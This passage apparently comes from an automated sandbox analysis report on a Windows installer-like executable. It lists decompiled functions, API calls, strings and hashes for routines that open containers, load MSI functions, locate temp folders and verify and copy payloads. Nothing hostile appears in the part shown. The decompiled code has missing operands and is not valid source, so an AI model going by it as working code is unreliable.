                                                                                                                                                                  						_t66 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t56 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "container.cpp", 0xe1, _t56);
                                                                                                                                                                  						_push(_a16);
                                                                                                                                                                  						_push("Failed to open file: %ls");
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_push(_t56);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t56;
                                                                                                                                                                  			}













                                                                                                                                                                  0x00418f91
                                                                                                                                                                  0x00418f96
                                                                                                                                                                  0x00419035
                                                                                                                                                                  0x0041903b
                                                                                                                                                                  0x00419045
                                                                                                                                                                  0x0041903d
                                                                                                                                                                  0x0041903d
                                                                                                                                                                  0x00419040
                                                                                                                                                                  0x00419040
                                                                                                                                                                  0x00419047
                                                                                                                                                                  0x00419055
                                                                                                                                                                  0x00419090
                                                                                                                                                                  0x0041909b
                                                                                                                                                                  0x0041909f
                                                                                                                                                                  0x004190a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004190a1
                                                                                                                                                                  0x0041909f
                                                                                                                                                                  0x00419057
                                                                                                                                                                  0x00419057
                                                                                                                                                                  0x00419068
                                                                                                                                                                  0x00419072
                                                                                                                                                                  0x00419080
                                                                                                                                                                  0x00419085
                                                                                                                                                                  0x004190a6
                                                                                                                                                                  0x004190a6
                                                                                                                                                                  0x004190a7
                                                                                                                                                                  0x004190ad
                                                                                                                                                                  0x00418f9c
                                                                                                                                                                  0x00418f9c
                                                                                                                                                                  0x00418fad
                                                                                                                                                                  0x00418fb7
                                                                                                                                                                  0x00418fc5
                                                                                                                                                                  0x00418fca
                                                                                                                                                                  0x00418fcd
                                                                                                                                                                  0x00419028
                                                                                                                                                                  0x00419028
                                                                                                                                                                  0x00419029
                                                                                                                                                                  0x0041902e
                                                                                                                                                                  0x00418f96
                                                                                                                                                                  0x004190b4

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00401F17,00000000,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283), ref: 00418F8B
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418F9C
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,00000000,00000000,00000002,00401F17,00000000,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17), ref: 00418FDF
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418FE5
                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418FE8
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00418FF2
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 0041904D
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00419057
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
                                                                                                                                                                  • API String ID: 2619879409-2168299741
                                                                                                                                                                  • Opcode ID: 9fb42e0eb9429fd66eefd839e7e0d1a44353d45427f0474d1950670866a9dd9d
                                                                                                                                                                  • Instruction ID: 7416660654b34e50ad6095a59235e3d814afae6169e601bf21221cf26e7b1805
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fb42e0eb9429fd66eefd839e7e0d1a44353d45427f0474d1950670866a9dd9d
                                                                                                                                                                  • Instruction Fuzzy Hash: BB419631200200AFEB209F2A9C55F5B7BE5EBC8760F21411AFD08DB291DB79DC11DBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E0043541A(void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				_Unknown_base(*)()* _t12;
                                                                                                                                                                  				_Unknown_base(*)()* _t13;
                                                                                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                                                                                  				_Unknown_base(*)()* _t15;
                                                                                                                                                                  				_Unknown_base(*)()* _t16;
                                                                                                                                                                  				_Unknown_base(*)()* _t17;
                                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                                  				void* _t33;
                                                                                                                                                                  
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t33 = E004300F0(__ecx, __edx, __eflags, L"Msi.dll", 0x457f04,  &_v8);
                                                                                                                                                                  				if(_t33 >= 0) {
                                                                                                                                                                  					E0043710A(_v8, 0x457f24, 0x457f28);
                                                                                                                                                                  					_t12 = GetProcAddress( *0x457f04, "MsiDeterminePatchSequenceW");
                                                                                                                                                                  					_t19 =  *0x457eec;
                                                                                                                                                                  					_t20 =  ==  ? _t12 : _t19;
                                                                                                                                                                  					 *0x457f08 = _t12;
                                                                                                                                                                  					 *0x457eec =  ==  ? _t12 : _t19;
                                                                                                                                                                  					_t13 = GetProcAddress( *0x457f04, "MsiEnumProductsExW");
                                                                                                                                                                  					_t21 =  *0x457ef0;
                                                                                                                                                                  					_t22 =  ==  ? _t13 : _t21;
                                                                                                                                                                  					 *0x457f0c = _t13;
                                                                                                                                                                  					 *0x457ef0 =  ==  ? _t13 : _t21;
                                                                                                                                                                  					_t14 = GetProcAddress( *0x457f04, "MsiGetPatchInfoExW");
                                                                                                                                                                  					_t23 =  *0x457ef4;
                                                                                                                                                                  					_t24 =  ==  ? _t14 : _t23;
                                                                                                                                                                  					 *0x457f10 = _t14;
                                                                                                                                                                  					 *0x457ef4 =  ==  ? _t14 : _t23;
                                                                                                                                                                  					_t15 = GetProcAddress( *0x457f04, "MsiGetProductInfoExW");
                                                                                                                                                                  					_t25 =  *0x457ef8;
                                                                                                                                                                  					_t26 =  ==  ? _t15 : _t25;
                                                                                                                                                                  					 *0x457f14 = _t15;
                                                                                                                                                                  					 *0x457ef8 =  ==  ? _t15 : _t25;
                                                                                                                                                                  					_t16 = GetProcAddress( *0x457f04, "MsiSetExternalUIRecord");
                                                                                                                                                                  					_t27 =  *0x457efc;
                                                                                                                                                                  					_t28 =  ==  ? _t16 : _t27;
                                                                                                                                                                  					 *0x457f18 = _t16;
                                                                                                                                                                  					 *0x457efc =  ==  ? _t16 : _t27;
                                                                                                                                                                  					_t17 = GetProcAddress( *0x457f04, "MsiSourceListAddSourceExW");
                                                                                                                                                                  					_t29 =  *0x457f00;
                                                                                                                                                                  					_t30 =  ==  ? _t17 : _t29;
                                                                                                                                                                  					 *0x457f1c = _t17;
                                                                                                                                                                  					 *0x457f00 =  ==  ? _t17 : _t29;
                                                                                                                                                                  					 *0x457f20 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t33;
                                                                                                                                                                  			}

















                                                                                                                                                                  0x0043553f
                                                                                                                                                                  0x0043553f
                                                                                                                                                                  0x00435548

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004300F0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0043012F
                                                                                                                                                                    • Part of subcall function 004300F0: LoadLibraryW.KERNEL32(?,?,00000104,00401CC1), ref: 00430182
                                                                                                                                                                    • Part of subcall function 004300F0: GetLastError.KERNEL32 ref: 0043018E
                                                                                                                                                                    • Part of subcall function 0043710A: GetFileVersionInfoSizeW.VERSION(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437127
                                                                                                                                                                    • Part of subcall function 0043710A: GetLastError.KERNEL32(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437132
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00435464
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00435487
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 004354AA
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 004354CD
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 004354F0
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00435513
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectoryFileInfoLibraryLoadSizeSystemVersion
                                                                                                                                                                  • String ID: Msi.dll$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                  • API String ID: 604185022-49624773
                                                                                                                                                                  • Opcode ID: 671b73a8d39f631f3725b8eacff8dfa9536055a6cacaff96ddba980fce7ba59f
                                                                                                                                                                  • Instruction ID: 3df29f9c1aa33baadb6d03a07f2fb82d58114b349fffdf6cc387af28fc212ff3
                                                                                                                                                                  • Opcode Fuzzy Hash: 671b73a8d39f631f3725b8eacff8dfa9536055a6cacaff96ddba980fce7ba59f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D213C72648304AEDB0ACF29FD52B293AB5E748703B1044BEE50692662E7B5DD04DB4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                                  			E0040E054(void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				short _v528;
                                                                                                                                                                  				short* _v532;
                                                                                                                                                                  				int _v536;
                                                                                                                                                                  				char _v540;
                                                                                                                                                                  				char _v544;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t29;
                                                                                                                                                                  				long _t39;
                                                                                                                                                                  				signed short _t54;
                                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                                  				long _t71;
                                                                                                                                                                  				signed int _t73;
                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                  
                                                                                                                                                                  				_t66 = __edi;
                                                                                                                                                                  				_t29 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t29 ^ _t77;
                                                                                                                                                                  				_t57 = _a4;
                                                                                                                                                                  				_push(0x208);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v528);
                                                                                                                                                                  				E004267C0(_a4, __ecx, __edi, 0, __eflags);
                                                                                                                                                                  				_v544 = 0;
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				_v540 = 0;
                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                  				if(GetTempPathW(0x104,  &_v528) != 0) {
                                                                                                                                                                  					_t71 = E0040E205( &_v528, 0x104,  &_v540);
                                                                                                                                                                  					__eflags = _t71;
                                                                                                                                                                  					if(_t71 >= 0) {
                                                                                                                                                                  						_t39 = GetCurrentProcessId();
                                                                                                                                                                  						__imp__ProcessIdToSessionId(_t39,  &_v544, __edi);
                                                                                                                                                                  						__eflags = _t39;
                                                                                                                                                                  						if(_t39 == 0) {
                                                                                                                                                                  							_t67 = _v540;
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t71 = E00433CEA( &_v532, L"%u\\", _v544);
                                                                                                                                                                  							__eflags = _t71;
                                                                                                                                                                  							if(_t71 >= 0) {
                                                                                                                                                                  								_t71 = E0040E205(_v532, 0x7fffffff,  &_v536);
                                                                                                                                                                  								__eflags = _t71;
                                                                                                                                                                  								if(_t71 >= 0) {
                                                                                                                                                                  									_t68 = _v540;
                                                                                                                                                                  									_t73 = _t68 - _v536;
                                                                                                                                                                  									__eflags = CompareStringW(0, 0,  &(( &_v528)[_t73]), _v536, _v532, _v536) - 2;
                                                                                                                                                                  									_t67 =  ==  ? _t73 : _t68;
                                                                                                                                                                  									L12:
                                                                                                                                                                  									_t71 = E00433F88(_t57,  &_v528, _t67);
                                                                                                                                                                  									__eflags = _t71;
                                                                                                                                                                  									if(_t71 < 0) {
                                                                                                                                                                  										_push("Failed to copy temp folder.");
                                                                                                                                                                  										goto L14;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to get length of session id string.");
                                                                                                                                                                  									goto L14;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to format session id as a string.");
                                                                                                                                                                  								L14:
                                                                                                                                                                  								_push(_t71);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						_pop(_t66);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get length of temp folder.");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t54 = GetLastError();
                                                                                                                                                                  					_t76 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t71 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "logging.cpp", 0x25d, _t71);
                                                                                                                                                                  					_push("Failed to get temp folder.");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t71);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v532 != 0) {
                                                                                                                                                                  					E004380AB(_v532);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t71, _v8 ^ _t77, _t66, _t71);
                                                                                                                                                                  			}



















                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e174
                                                                                                                                                                  0x0040e150
                                                                                                                                                                  0x0040e150
                                                                                                                                                                  0x0040e1d6
                                                                                                                                                                  0x0040e1d6
                                                                                                                                                                  0x0040e1d7
                                                                                                                                                                  0x0040e1dd
                                                                                                                                                                  0x0040e14e
                                                                                                                                                                  0x0040e1de
                                                                                                                                                                  0x0040e101
                                                                                                                                                                  0x0040e101
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e101
                                                                                                                                                                  0x0040e0b2
                                                                                                                                                                  0x0040e0b2
                                                                                                                                                                  0x0040e0c3
                                                                                                                                                                  0x0040e0cd
                                                                                                                                                                  0x0040e0db
                                                                                                                                                                  0x0040e0e0
                                                                                                                                                                  0x0040e106
                                                                                                                                                                  0x0040e106
                                                                                                                                                                  0x0040e107
                                                                                                                                                                  0x0040e10d
                                                                                                                                                                  0x0040e1e6
                                                                                                                                                                  0x0040e1ee
                                                                                                                                                                  0x0040e1ee
                                                                                                                                                                  0x0040e202

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,0000000D), ref: 0040E0A8
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000000D), ref: 0040E0B2
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,00000104,?,?,00000000,0000000D), ref: 0040E11B
                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,0000000D), ref: 0040E122
                                                                                                                                                                  Strings
                                                                                                                                                                  • logging.cpp, xrefs: 0040E0D6
                                                                                                                                                                  • Failed to format session id as a string., xrefs: 0040E150
                                                                                                                                                                  • %u\, xrefs: 0040E13C
                                                                                                                                                                  • Failed to get length of session id string., xrefs: 0040E174
                                                                                                                                                                  • Failed to get temp folder., xrefs: 0040E0E0
                                                                                                                                                                  • Failed to copy temp folder., xrefs: 0040E1D1
                                                                                                                                                                  • Failed to get length of temp folder., xrefs: 0040E101
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentErrorLastPathSessionTemp
                                                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$logging.cpp
                                                                                                                                                                  • API String ID: 1726527325-1016737523
                                                                                                                                                                  • Opcode ID: fe347eac5391b205a21a64329b375ecf239509166f1da3d8a7edc196910f0388
                                                                                                                                                                  • Instruction ID: edc81f4efe92e158245f526fed0c72a384885faa22c09e9bad2494442a47f862
                                                                                                                                                                  • Opcode Fuzzy Hash: fe347eac5391b205a21a64329b375ecf239509166f1da3d8a7edc196910f0388
                                                                                                                                                                  • Instruction Fuzzy Hash: 2941C372D4023DAADB209B619C49BDE77B8AF14710F1106A7F908F7281DA789E418FD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 19%
                                                                                                                                                                  			E00412F1F(void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                                                                                                                                  				intOrPtr _t15;
                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                  				signed short _t27;
                                                                                                                                                                  				intOrPtr _t32;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				WCHAR* _t37;
                                                                                                                                                                  				intOrPtr _t39;
                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                  
                                                                                                                                                                  				_t36 = __edx;
                                                                                                                                                                  				_t37 = _a12;
                                                                                                                                                                  				_t34 = CreateFileW(_t37, 0x80000000, 5, 0, 3, 0x8000000, 0);
                                                                                                                                                                  				_a12 = _t34;
                                                                                                                                                                  				if(_t34 != 0xffffffff) {
                                                                                                                                                                  					_t15 = _a4;
                                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t15 + 0x20));
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t15 + 0x1c));
                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                  							__eflags =  *((intOrPtr*)(_t15 + 0x30));
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								goto L12;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t40 = E0041296C(_t36, __eflags,  *((intOrPtr*)(_t15 + 0x30)),  *((intOrPtr*)(_t15 + 0x34)), _t37, _t34);
                                                                                                                                                                  								__eflags = _t40;
                                                                                                                                                                  								if(_t40 >= 0) {
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push(_a8);
                                                                                                                                                                  									_push("Failed to verify payload hash: %ls");
                                                                                                                                                                  									goto L11;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t26 = E00412B6A(_t34, _t36, __eflags, _t15, _t37, _t34);
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t26 = E004141E9(_t34, _t36, __eflags, _t15, _t37, _t34);
                                                                                                                                                                  						L6:
                                                                                                                                                                  						_t40 = _t26;
                                                                                                                                                                  						__eflags = _t40;
                                                                                                                                                                  						if(_t40 >= 0) {
                                                                                                                                                                  							L12:
                                                                                                                                                                  							_t39 = _a16;
                                                                                                                                                                  							_t32 = _a8;
                                                                                                                                                                  							_push(_t32);
                                                                                                                                                                  							_push(_t37);
                                                                                                                                                                  							__eflags = _t39;
                                                                                                                                                                  							_t17 =  ==  ? L"Copying" : L"Moving";
                                                                                                                                                                  							E00430F28(2, "%ls payload from working path \'%ls\' to path \'%ls\'",  ==  ? L"Copying" : L"Moving");
                                                                                                                                                                  							_push(0x7d0);
                                                                                                                                                                  							_push(3);
                                                                                                                                                                  							_push(1);
                                                                                                                                                                  							__eflags = _t39;
                                                                                                                                                                  							if(_t39 == 0) {
                                                                                                                                                                  								_push(_t32);
                                                                                                                                                                  								_push(_t37);
                                                                                                                                                                  								_t40 = E004367C5();
                                                                                                                                                                  								__eflags = _t40;
                                                                                                                                                                  								if(_t40 < 0) {
                                                                                                                                                                  									_push(_t32);
                                                                                                                                                                  									_push(_t37);
                                                                                                                                                                  									_push("Failed to copy %ls to %ls");
                                                                                                                                                                  									goto L17;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(1);
                                                                                                                                                                  								_push(_t32);
                                                                                                                                                                  								_push(_t37);
                                                                                                                                                                  								_t40 = E004369B5();
                                                                                                                                                                  								__eflags = _t40;
                                                                                                                                                                  								if(_t40 < 0) {
                                                                                                                                                                  									_push(_t32);
                                                                                                                                                                  									_push(_t37);
                                                                                                                                                                  									_push("Failed to move %ls to %ls");
                                                                                                                                                                  									L17:
                                                                                                                                                                  									_push(_t40);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push(_a8);
                                                                                                                                                                  							_push("Failed to verify payload signature: %ls");
                                                                                                                                                                  							L11:
                                                                                                                                                                  							_push(_t40);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					CloseHandle(_a12);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t27 = GetLastError();
                                                                                                                                                                  					_t43 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t40 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "cache.cpp", 0x4cc, _t40);
                                                                                                                                                                  					E00430A57(_t40, "Failed to open payload in working path: %ls", _t37);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t40;
                                                                                                                                                                  			}













                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,00413ED8,?,00000000,?,?,0042195B), ref: 00412F3A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00413ED8,?,00000000,?,?,0042195B,80000000,00000000,?,00000000,?,?,0042195B,?), ref: 00412F4A
                                                                                                                                                                  • CloseHandle.KERNEL32(?,0042195B,00000001,00000003,000007D0,?,?,0042195B,?), ref: 00413054
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls payload from working path '%ls' to path '%ls', xrefs: 00412FFF
                                                                                                                                                                  • Failed to copy %ls to %ls, xrefs: 00413042
                                                                                                                                                                  • Copying, xrefs: 00412FEE
                                                                                                                                                                  • Moving, xrefs: 00412FF4, 00412FFE
                                                                                                                                                                  • Failed to verify payload hash: %ls, xrefs: 00412FD6
                                                                                                                                                                  • Failed to verify payload signature: %ls, xrefs: 00412FB4
                                                                                                                                                                  • Failed to move %ls to %ls, xrefs: 0041302C
                                                                                                                                                                  • cache.cpp, xrefs: 00412F6E
                                                                                                                                                                  • Failed to open payload in working path: %ls, xrefs: 00412F79
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-1604654059
                                                                                                                                                                  • Opcode ID: fcabf9cac1f0a69adcaae417d8e1baa82ff4596af7f1c3e34b68d6f8015abf0e
                                                                                                                                                                  • Instruction ID: 9fbc55e016c11a6390af3b12303287f077f01eb6ce678a2460e5d860c9d8ca1e
                                                                                                                                                                  • Opcode Fuzzy Hash: fcabf9cac1f0a69adcaae417d8e1baa82ff4596af7f1c3e34b68d6f8015abf0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 01313C71A40624BBEB321E168C06FAF296CDF45F64F01021BFD04FB281D7A88D5155ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E004240D7(void* _a4, intOrPtr _a8) {
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  				void* _t12;
                                                                                                                                                                  				void* _t13;
                                                                                                                                                                  				void* _t29;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  
                                                                                                                                                                  				_t29 = _a4;
                                                                                                                                                                  				 *(_t29 + 0x3c) =  *(_t29 + 0x3c) | 0xffffffff;
                                                                                                                                                                  				_t5 = _t29 + 0x1c; // 0x1d
                                                                                                                                                                  				_t30 = E00433F88(_t5, _a8, 0);
                                                                                                                                                                  				if(_t30 >= 0) {
                                                                                                                                                                  					_t11 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                  					 *(_t29 + 0x24) = _t11;
                                                                                                                                                                  					if(_t11 != 0) {
                                                                                                                                                                  						_t12 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                  						 *(_t29 + 0x28) = _t12;
                                                                                                                                                                  						if(_t12 != 0) {
                                                                                                                                                                  							_t13 = CreateThread(0, 0, E00423A9C, _t29, 0, 0);
                                                                                                                                                                  							 *(_t29 + 0x20) = _t13;
                                                                                                                                                                  							if(_t13 != 0) {
                                                                                                                                                                  								_t30 = E00423E70(_t29);
                                                                                                                                                                  								if(_t30 < 0) {
                                                                                                                                                                  									_push("Failed to wait for operation complete.");
                                                                                                                                                                  									goto L10;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t34 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								E004300D9(0x80004005, "cabextract.cpp", 0x9e, _t30);
